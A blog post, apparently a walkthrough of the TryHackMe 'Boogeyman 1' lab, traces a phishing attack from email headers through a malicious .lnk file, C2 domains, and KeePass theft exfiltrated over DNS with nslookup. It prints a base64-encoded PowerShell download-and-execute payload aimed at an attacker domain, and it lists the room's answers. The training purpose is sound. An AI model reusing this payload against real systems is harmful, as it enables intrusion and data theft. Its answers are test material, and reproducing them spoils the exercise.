attheoaks.com

Unveiling the Boogeyman: A Deep Dive into Threat Analysis

Written on

Chapter 1: Introduction to the Boogeyman Threat

A new threat actor has surfaced, adopting the moniker "Boogeyman." This persona raises concerns in the cybersecurity community. Are you prepared to face the Boogeyman?

In this section, we will explore the details of the incident.

Section 1.1: Key Information from the Attack

To begin our investigation, we must gather some crucial information. Here are the significant details regarding the phishing email involved:

  • Sender's Email Address: [email protected]
  • Victim's Email Address: [email protected]
  • Third-Party Mail Relay Service: The service used by the attacker, as inferred from the DKIM-Signature and List-Unsubscribe headers, is elasticemail.

Subsection 1.1.1: Analyzing the Encrypted Attachment

Investigating the Encrypted Attachment in Boogeyman Case

Within the encrypted attachment, we find a file named Invoice_20230103.lnk. To access its contents, you'll need the following password: Invoice2023!.

Section 1.2: Payload and Domain Analysis

Next, we need to investigate the encoded payload identified in the Command Line Arguments field using the lnkparse tool. The payload is:

aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZgBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==

For the attacker's file hosting and Command and Control (C2), the domains utilized are:

  • cdn.bpakcaging.xyz
  • files.bpakcaging.xyz

Chapter 2: Tools and Techniques Used by the Attacker

In our exploration, we note that the attacker downloaded an enumeration tool named seatbelt. Additionally, the attacker accessed a file using the sq3.exe binary located at:

C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

The software associated with this file is Microsoft Sticky Notes.

The second video expands upon the Boogeyman-1 TryHackMe Walkthrough, detailing further insights and methodologies.

Continuing our analysis, we find that the exfiltrated file is named protected_data.kdbx, which is associated with the keepass file type. The encoding method used during the exfiltration of sensitive data was hex, and the tool utilized for this exfiltration was nslookup.

As we delve deeper, we discover that the HTTP method employed by the C2 server for transmitting command outputs was POST and the exfiltration protocol used was DNS.

In summary, the password for the exfiltrated file can be decoded from the TCP stream, while the credit card number stored within it is identified through specific Wireshark queries.

That's all for now! Thank you for joining us in this detailed exploration. See you in the next room!

Share the page:

Twitter Facebook Reddit LinkIn

-----------------------

Recent Post:

Creating a Real-Time Coffee Level Indicator with IoT

Learn how to build a coffee level indicator using IoT technology, including an ultrasonic sensor and NodeMCU.

The Ultimate Guide to Genuine Blogging Success

Discover the truth about blogging myths and learn how to achieve real success in the blogging world.

The Enduring Lesson of Amalek: Justice and Righteousness

Explore the timeless narrative of Amalek, emphasizing justice, righteousness, and the repercussions of unprovoked aggression.

Navigating the Pain of No Contact: Embracing Healing and Growth

Understanding the challenges of no contact and how to heal while cherishing memories without longing for the past.

The Colorful Intersection of Sound and Vision: A Deep Dive

Discover how synesthesia intertwines senses, influencing perception and creativity in art and music.

# Embracing Time: A Journey of Self-Discovery for Liana

Explore Liana's journey of self-discovery as she learns to navigate time and personal growth.

Unlocking the Side Hustle Revolution: Seize Your Opportunity Now

Discover how AI is transforming the side hustle landscape, leading to a booming $1.4 trillion industry by 2030.

# Unlock 5 Years of Email Marketing Insights in Just 5 Minutes

Discover essential email marketing techniques to boost open rates and engagement with simple yet effective strategies.